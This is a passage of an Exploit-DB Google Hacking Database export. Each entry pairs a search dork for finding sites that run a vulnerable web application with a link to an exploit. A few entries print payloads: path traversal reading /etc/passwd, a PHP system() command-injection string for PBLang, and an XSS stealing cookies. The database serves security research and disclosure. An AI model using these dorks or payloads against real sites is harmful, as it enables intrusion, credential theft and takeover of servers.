<edb>https://www.exploit-db.com/exploits/4211</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3515</id>
<link>https://www.exploit-db.com/ghdb/3515</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;propulsé par DotClear&quot; &quot;fil atom&quot; &quot;fil rss&quot; +commentaires</shortDescription>
<textualDescription>DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: https://www.exploit-db.com/exploits/1869</textualDescription>
<query>&quot;propulsé par DotClear&quot; &quot;fil atom&quot; &quot;fil rss&quot; +commentaires</query>
<querystring>https://www.google.com/search?q=%22propuls%C3%A9+par+DotClear%22+%22fil+atom%22+%22fil+rss%22+%2Bcommentaires</querystring>
<edb>https://www.exploit-db.com/exploits/1869</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1556</id>
<link>https://www.exploit-db.com/ghdb/1556</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;qjForum&quot;</shortDescription>
<textualDescription>qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: https://www.exploit-db.com/exploits/1833</textualDescription>
<query>&quot;qjForum&quot;</query>
<querystring>https://www.google.com/search?q=%22qjForum%22</querystring>
<edb>https://www.exploit-db.com/exploits/1833</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2936</id>
<link>https://www.exploit-db.com/ghdb/2936</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;realizacja eCreo.eu&quot;</shortDescription>
<textualDescription>eCreo SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12713</textualDescription>
<query>&quot;realizacja eCreo.eu&quot;</query>
<querystring>https://www.google.com/search?q=%22realizacja+eCreo.eu%22</querystring>
<edb>https://www.exploit-db.com/exploits/12713</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1724</id>
<link>https://www.exploit-db.com/ghdb/1724</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;REALTOR 747 - Version 4.11&quot;</shortDescription>
<textualDescription>Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: https://www.exploit-db.com/exploits/7743</textualDescription>
<query>&quot;REALTOR 747 - Version 4.11&quot;</query>
<querystring>https://www.google.com/search?q=%22REALTOR+747+-+Version+4.11%22</querystring>
<edb>https://www.exploit-db.com/exploits/7743</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1740</id>
<link>https://www.exploit-db.com/ghdb/1740</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Review Script&quot; &quot;Phil Taylor&quot;</shortDescription>
<textualDescription>Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: https://www.exploit-db.com/exploits/5094</textualDescription>
<query>&quot;Review Script&quot; &quot;Phil Taylor&quot;</query>
<querystring>https://www.google.com/search?q=%22Review+Script%22+%22Phil+Taylor%22</querystring>
<edb>https://www.exploit-db.com/exploits/5094</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1477</id>
<link>https://www.exploit-db.com/ghdb/1477</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;RS MAXSOFT&quot;</shortDescription>
<textualDescription>RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: https://www.exploit-db.com/exploits/5426</textualDescription>
<query>&quot;RS MAXSOFT&quot;</query>
<querystring>https://www.google.com/search?q=%22RS+MAXSOFT%22</querystring>
<edb>https://www.exploit-db.com/exploits/5426</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3563</id>
<link>https://www.exploit-db.com/ghdb/3563</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Runcms Copyright&quot; &quot;2002 - 2007&quot; +&quot;page created&quot;</shortDescription>
<textualDescription>RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539:
https://www.exploit-db.com/exploits/3850</textualDescription>
<query>&quot;Runcms Copyright&quot; &quot;2002 - 2007&quot; +&quot;page created&quot;</query>
<querystring>https://www.google.com/search?q=Runcms+Copyright%22+%222002+-+2007%22+%2B%22page+created%22</querystring>
<edb>https://www.exploit-db.com/exploits/3850</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>673</id>
<link>https://www.exploit-db.com/ghdb/673</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;running: Nucleus v3.1&quot; -.nucleuscms.org -demo</shortDescription>
<textualDescription>Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631</textualDescription>
<query>&quot;running: Nucleus v3.1&quot; -.nucleuscms.org -demo</query>
<querystring>https://www.google.com/search?q=%22running%3A+Nucleus+v3.1%22+-.nucleuscms.org+-demo</querystring>
<edb></edb>
<date>2004-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3167</id>
<link>https://www.exploit-db.com/ghdb/3167</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;S-CMS by matteoiamma&quot; </shortDescription>
<textualDescription>S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/8913</textualDescription>
<query>&quot;S-CMS by matteoiamma&quot;</query>
<querystring>https://www.google.com/search?q=%22S-CMS+by+matteoiamma%22</querystring>
<edb>https://www.exploit-db.com/exploits/8913</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3383</id>
<link>https://www.exploit-db.com/ghdb/3383</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;S-CMS by matteoiamma&quot; </shortDescription>
<textualDescription>S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/8914</textualDescription>
<query>&quot;S-CMS by matteoiamma&quot;</query>
<querystring>https://www.google.com/search?q=%22S-CMS+by+matteoiamma%22</querystring>
<edb>https://www.exploit-db.com/exploits/8914</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2888</id>
<link>https://www.exploit-db.com/ghdb/2888</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Scientific Image DataBase&quot;</shortDescription>
<textualDescription>Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: https://www.exploit-db.com/exploits/5885</textualDescription>
<query>&quot;Scientific Image DataBase&quot;</query>
<querystring>https://www.google.com/search?q=%22Scientific+Image+DataBase%22</querystring>
<edb>https://www.exploit-db.com/exploits/5885</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2677</id>
<link>https://www.exploit-db.com/ghdb/2677</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;script by RECIPE SCRIPT&quot;</shortDescription>
<textualDescription>The Recipe Script 5 Remote XSS Vulnerability: https://www.exploit-db.com/exploits/8967</textualDescription>
<query>&quot;script by RECIPE SCRIPT&quot;</query>
<querystring>https://www.google.com/search?q=%22script+by+RECIPE+SCRIPT%22</querystring>
<edb>https://www.exploit-db.com/exploits/8967</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1893</id>
<link>https://www.exploit-db.com/ghdb/1893</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Script réalisé par BinGo PHP&quot;</shortDescription>
<textualDescription>BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: https://www.exploit-db.com/exploits/2312</textualDescription>
<query>&quot;Script réalisé par BinGo PHP&quot;</query>
<querystring>https://www.google.com/search?q=%22Script+r%C3%A9alis%C3%A9+par+BinGo+PHP%22</querystring>
<edb>https://www.exploit-db.com/exploits/2312</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1812</id>
<link>https://www.exploit-db.com/ghdb/1812</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Search Adult Directory:&quot;</shortDescription>
<textualDescription>Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: https://www.exploit-db.com/exploits/4238</textualDescription>
<query>&quot;Search Adult Directory:&quot;</query>
<querystring>https://www.google.com/search?q=%22Search+Adult+Directory:%22</querystring>
<edb>https://www.exploit-db.com/exploits/4238</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2018</id>
<link>https://www.exploit-db.com/ghdb/2018</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Search Affiliate Programs:&quot;</shortDescription>
<textualDescription>Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility: https://www.exploit-db.com/exploits/5363</textualDescription>
<query>&quot;Search Affiliate Programs:&quot;</query>
<querystring>https://www.google.com/search?q=%22Search+Affiliate+Programs:%22</querystring>
<edb>https://www.exploit-db.com/exploits/5363</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3347</id>
<link>https://www.exploit-db.com/ghdb/3347</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Search Projects&quot; intitle:&quot;The ultimate project website&quot;</shortDescription>
<textualDescription>Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: https://www.exploit-db.com/exploits/4660</textualDescription>
<query>&quot;Search Projects&quot; intitle:&quot;The ultimate project website&quot;</query>
<querystring>https://www.google.com/search?q=%22Search+Projects%22+intitle:%22The+ultimate+project+website%22</querystring>
<edb>https://www.exploit-db.com/exploits/4660</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1845</id>
<link>https://www.exploit-db.com/ghdb/1845</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Search | Invite | Mail | Blog | Forum&quot;</shortDescription>
<textualDescription>Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: https://www.exploit-db.com/exploits/4628</textualDescription>
<query>&quot;Search | Invite | Mail | Blog | Forum&quot;</query>
<querystring>https://www.google.com/search?q=%22Search+|+Invite+|+Mail+|+Blog+|+Forum%22</querystring>
<edb>https://www.exploit-db.com/exploits/4628</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2213</id>
<link>https://www.exploit-db.com/ghdb/2213</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Search | Invite | Mail | Blog | Forum&quot;</shortDescription>
<textualDescription>Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: https://www.exploit-db.com/exploits/4622</textualDescription>
<query>&quot;Search | Invite | Mail | Blog | Forum&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Search+|+Invite+|+Mail+|+Blog+|+Forum%22</querystring>
<edb>https://www.exploit-db.com/exploits/4622</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2222</id>
<link>https://www.exploit-db.com/ghdb/2222</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Send amazing greetings to your friends and relative!&quot;</shortDescription>
<textualDescription>greeting card Remote Upload Vulnerability: https://www.exploit-db.com/exploits/13751</textualDescription>
<query>&quot;Send amazing greetings to your friends and relative!&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Send+amazing+greetings+to+your+friends+and+relative!%22</querystring>
<edb>https://www.exploit-db.com/exploits/13751</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2699</id>
<link>https://www.exploit-db.com/ghdb/2699</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Send amazing greetings to your friends and relative!&quot;</shortDescription>
<textualDescription>Greeting card SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13983</textualDescription>
<query>&quot;Send amazing greetings to your friends and relative!&quot;</query>
<querystring>https://www.google.com/search?q=%22Send+amazing+greetings+to+your+friends+and+relative!%22</querystring>
<edb>https://www.exploit-db.com/exploits/13983</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2465</id>
<link>https://www.exploit-db.com/ghdb/2465</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ShopMaker v1.0&quot;</shortDescription>
<textualDescription>ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6799</textualDescription>
<query>&quot;ShopMaker v1.0&quot;</query>
<querystring>https://www.google.com/search?q=%22ShopMaker+v1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/6799</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2285</id>
<link>https://www.exploit-db.com/ghdb/2285</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Signkorn Guestbook 1.3&quot;</shortDescription>
<textualDescription>Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: https://www.exploit-db.com/exploits/2354</textualDescription>
<query>&quot;Signkorn Guestbook 1.3&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Signkorn+Guestbook+1.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/2354</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1545</id>
<link>https://www.exploit-db.com/ghdb/1545</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SimpleBlog 2.3 by 8pixel.net&quot;</shortDescription>
<textualDescription>SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: https://www.exploit-db.com/exploits/2853</textualDescription>
<query>&quot;SimpleBlog 2.3 by 8pixel.net&quot;</query>
<querystring>https://www.google.com/search?q=%22SimpleBlog+2.3+by+8pixel.net%22</querystring>
<edb>https://www.exploit-db.com/exploits/2853</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1693</id>
<link>https://www.exploit-db.com/ghdb/1693</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Sinapis by scripter.ch&quot;</shortDescription>
<textualDescription>Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: https://www.exploit-db.com/exploits/3367</textualDescription>
<query>&quot;Sinapis by scripter.ch&quot;</query>
<querystring>https://www.google.com/search?q=%22Sinapis+by+scripter.ch%22</querystring>
<edb>https://www.exploit-db.com/exploits/3367</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3705</id>
<link>https://www.exploit-db.com/ghdb/3705</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;site by Designscope&quot;</shortDescription>
<textualDescription>Submitter: Net.Edit0r
SQL Injection: http://127.0.0.1/general.php?pageID=[SQL] http://127.0.0.1/content.php?pageID=[SQL]</textualDescription>
<query>&quot;site by Designscope&quot;</query>
<querystring>https://www.google.com/search?q=%22site+by+Designscope%22</querystring>
<edb></edb>
<date>2011-03-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>2960</id>
<link>https://www.exploit-db.com/ghdb/2960</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site designed and built by Powder Blue.&quot; inurl:index.php?id_page=</shortDescription>
<textualDescription>Powder Blue Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12671</textualDescription>
<query>&quot;Site designed and built by Powder Blue.&quot; inurl:index.php?id_page=</query>
<querystring>https://www.google.com/search?q=%22Site+designed+and+built+by+Powder+Blue.%22+inurl:index.php%3Fid_page%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12671</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3082</id>
<link>https://www.exploit-db.com/ghdb/3082</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site designed and built by ProWeb Associates.&quot;</shortDescription>
<textualDescription>ProWeb Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12730</textualDescription>
<query>&quot;Site designed and built by ProWeb Associates.&quot;</query>
<querystring>https://www.google.com/search?q=%22Site+designed+and+built+by+ProWeb+Associates.%22</querystring>
<edb>https://www.exploit-db.com/exploits/12730</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3018</id>
<link>https://www.exploit-db.com/ghdb/3018</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site designed and built Powered by GlobalWebTek.&quot;</shortDescription>
<textualDescription>GlobalWebTek Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12761</textualDescription>
<query>&quot;Site designed and built Powered by GlobalWebTek.&quot;</query>
<querystring>https://www.google.com/search?q=%22Site+designed+and+built+Powered+by+GlobalWebTek.%22</querystring>
<edb>https://www.exploit-db.com/exploits/12761</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3316</id>
<link>https://www.exploit-db.com/ghdb/3316</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site powered by GuppY&quot;</shortDescription>
<textualDescription>GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: https://www.exploit-db.com/exploits/4602</textualDescription>
<query>&quot;Site powered by GuppY&quot;</query>
<querystring>https://www.google.com/search?q=%22Site+powered+by+GuppY%22</querystring>
<edb>https://www.exploit-db.com/exploits/4602</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3519</id>
<link>https://www.exploit-db.com/ghdb/3519</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site powered by GuppY&quot; | &quot;Site créé avec GuppY&quot; +inurl:lng=</shortDescription>
<textualDescription>GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: https://www.exploit-db.com/exploits/3221</textualDescription>
<query>&quot;Site powered by GuppY&quot; | &quot;Site créé avec GuppY&quot; +inurl:lng=</query>
<querystring>https://www.google.com/search?q=%22Site+powered+by+GuppY%22+|+%22Site+cr%C3%A9%C3%A9+avec+GuppY%22+%2Binurl:lng%3D</querystring>
<edb>https://www.exploit-db.com/exploits/3221</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2460</id>
<link>https://www.exploit-db.com/ghdb/2460</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;site powered by intuitive-websites.com&quot;</shortDescription>
<textualDescription>intuitive (form.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11481</textualDescription>
<query>&quot;site powered by intuitive-websites.com&quot;</query>
<querystring>https://www.google.com/search?q=%22site+powered+by+intuitive-websites.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/11481</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1220</id>
<link>https://www.exploit-db.com/ghdb/1220</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site powered By Limbo CMS&quot;</shortDescription>
<textualDescription>this is the dork for Limbo Cms</textualDescription>
<query>&quot;Site powered By Limbo CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Site+powered+By+Limbo+CMS%22&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2005-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>3616</id>
<link>https://www.exploit-db.com/ghdb/3616</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Site produced by GeneralProducts.co.uk&quot;</shortDescription>
<textualDescription>GeneralProducts (index.php?page=) Local File Inclusion Vulnerability
http://server/index.php?page=../../../../../../etc/passwd
Net.Edit0r - black.hat.tm@gmail.com</textualDescription>
<query>&quot;Site produced by GeneralProducts.co.uk&quot;</query>
<querystring>https://www.google.com/search?q=%22Site+produced+by+GeneralProducts.co.uk%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1891</id>
<link>https://www.exploit-db.com/ghdb/1891</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010&quot;</shortDescription>
<textualDescription>Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12701</textualDescription>
<query>&quot;Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010&quot;</query>
<querystring>https://www.google.com/search?q=%22Sitedesign+by:+Dieleman+www.dieleman.nl+-+Copyright+%C2%A9+2010%22</querystring>
<edb>https://www.exploit-db.com/exploits/12701</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1544</id>
<link>https://www.exploit-db.com/ghdb/1544</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Siteman Version 1.1.9&quot;</shortDescription>
<textualDescription>Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: https://www.exploit-db.com/exploits/4973</textualDescription>
<query>&quot;Siteman Version 1.1.9&quot;</query>
<querystring>https://www.google.com/search?q=%22Siteman+Version+1.1.9%22</querystring>
<edb>https://www.exploit-db.com/exploits/4973</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3123</id>
<link>https://www.exploit-db.com/ghdb/3123</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;sitio web diseñado por www.toronja.com.pe&quot;</shortDescription>
<textualDescription>toronja cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12770</textualDescription>
<query>&quot;sitio web diseñado por www.toronja.com.pe&quot;</query>
<querystring>https://www.google.com/search?q=%22sitio+web+dise%C3%B1ado+por+www.toronja.com.pe%22</querystring>
<edb>https://www.exploit-db.com/exploits/12770</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3511</id>
<link>https://www.exploit-db.com/ghdb/3511</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SmodBIP&quot; &amp; &quot;Aktualno.ci&quot;</shortDescription>
<textualDescription>SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: https://www.exploit-db.com/exploits/3678</textualDescription>
<query>&quot;SmodBIP&quot; &amp; &quot;Aktualno.ci&quot;</query>
<querystring>https://www.google.com/search?q=%22SmodBIP%22+%26+%22Aktualno.ci%22</querystring>
<edb>https://www.exploit-db.com/exploits/3678</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3512</id>
<link>https://www.exploit-db.com/ghdb/3512</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SmodCMS&quot; &amp; &quot;S.ownik&quot;</shortDescription>
<textualDescription>SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: https://www.exploit-db.com/exploits/3679</textualDescription>
<query>&quot;SmodCMS&quot; &amp; &quot;S.ownik&quot;</query>
<querystring>https://www.google.com/search?q=%22SmodCMS%22+%26+%22S.ownik%22</querystring>
<edb>https://www.exploit-db.com/exploits/3679</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1647</id>
<link>https://www.exploit-db.com/ghdb/1647</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;software 2004-2005 by randshop&quot;</shortDescription>
<textualDescription>Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: https://www.exploit-db.com/exploits/1971</textualDescription>
<query>&quot;software 2004-2005 by randshop&quot;</query>
<querystring>https://www.google.com/search?q=%22software+2004-2005+by+randshop%22</querystring>
<edb>https://www.exploit-db.com/exploits/1971</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2196</id>
<link>https://www.exploit-db.com/ghdb/2196</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Software Categories&quot; &quot;Featured Resources&quot; &quot;Search&quot;</shortDescription>
<textualDescription>HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: https://www.exploit-db.com/exploits/4633</textualDescription>
<query>&quot;Software Categories&quot; &quot;Featured Resources&quot; &quot;Search&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Software+Categories%22+%22Featured+Resources%22+%22Search%22</querystring>
<edb>https://www.exploit-db.com/exploits/4633</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2143</id>
<link>https://www.exploit-db.com/ghdb/2143</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Software PBLang 4.66z&quot; AND &quot;Software PBLang 4.60&quot; OR &quot;Software PBLang&quot;</shortDescription>
<textualDescription>PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: https://www.exploit-db.com/exploits/2428</textualDescription>
<query>&quot;Software PBLang 4.66z&quot; AND &quot;Software PBLang 4.60&quot; OR &quot;Software PBLang&quot;</query>
<querystring>https://www.google.com/search?q=%22Software+PBLang+4.66z%22+AND+%22Software+PBLang+4.60%22+OR+%22Software+PBLang%22</querystring>
<edb>https://www.exploit-db.com/exploits/2428</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1094</id>
<link>https://www.exploit-db.com/ghdb/1094</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Software PBLang&quot; 4.65 filetype:php</shortDescription>
<textualDescription>my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php: ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp'); ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid&quot;; system($HTTP_POST_VARS[cmd]); echo &quot;in /db/members/[username] file we have...$userlocation=&quot;madrid&quot;; system($HTTP_GET_VARS[cmd]); echo &quot;&quot;;...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&amp;cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid&quot;; echo &quot;alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: &quot;Software PBLang&quot; filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]</textualDescription>
<query>&quot;Software PBLang&quot; 4.65 filetype:php</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Software+PBLang%22+4.65+filetype%3Aphp</querystring>
<edb></edb>
<date>2005-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3627</id>
<link>https://www.exploit-db.com/ghdb/3627</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SOOP Portal 2.0&quot;</shortDescription>
<textualDescription>Submitted by: Net.Edit0r Shell Upload: https://www.exploit-db.com/exploits/15690</textualDescription>
<query>&quot;SOOP Portal 2.0&quot;</query>
<querystring>https://www.google.com/search?q=%22SOOP%20Portal%202.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/15690</edb>
<date>2010-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3395</id>
<link>https://www.exploit-db.com/ghdb/3395</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Splatt Forum©&quot;</shortDescription>
<textualDescription>PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: https://www.exploit-db.com/exploits/3518</textualDescription>
<query>&quot;Splatt Forum©&quot;</query>
<querystring>https://www.google.com/search?q=%22Splatt+Forum%C2%A9%22</querystring>
<edb>https://www.exploit-db.com/exploits/3518</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1760</id>
<link>https://www.exploit-db.com/ghdb/1760</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SQuery 4.5&quot; |&quot;SQuery 4.0&quot; |&quot;SQuery 3.9&quot; | inurl:&quot;modules.php?name=SQuery&quot;</shortDescription>
<textualDescription>SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2003</textualDescription>
<query>&quot;SQuery 4.5&quot; |&quot;SQuery 4.0&quot; |&quot;SQuery 3.9&quot; | inurl:&quot;modules.php?name=SQuery&quot;</query>
<querystring>https://www.google.com/search?q=%22SQuery+4.5%22+|%22SQuery+4.0%22+|%22SQuery+3.9%22+|+inurl:%22modules.php%3Fname%3DSQuery%22</querystring>
<edb>https://www.exploit-db.com/exploits/2003</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>852</id>
<link>https://www.exploit-db.com/ghdb/852</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;SquirrelMail version 1.4.4&quot; inurl:src ext:php</shortDescription>
